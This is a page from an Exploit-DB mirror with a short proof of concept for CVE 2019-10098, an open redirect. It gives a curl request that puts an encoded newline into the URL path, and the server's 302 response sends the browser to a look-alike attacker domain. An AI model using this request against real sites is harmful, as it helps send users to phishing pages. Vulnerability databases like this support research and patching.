exploit-db-mirror/exploits/multiple/webapps/47689.md at main

Offensive Security b4c96a5864 DB: 2021-09-03

28807 changes to exploits/shellcodes

2021-09-03 20:19:21 +00:00

431 B

Raw Permalink Blame History

Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to https://redirect.local.evilwebsite.com):

curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com

431 B Raw Permalink Blame History

431 B

Raw Permalink Blame History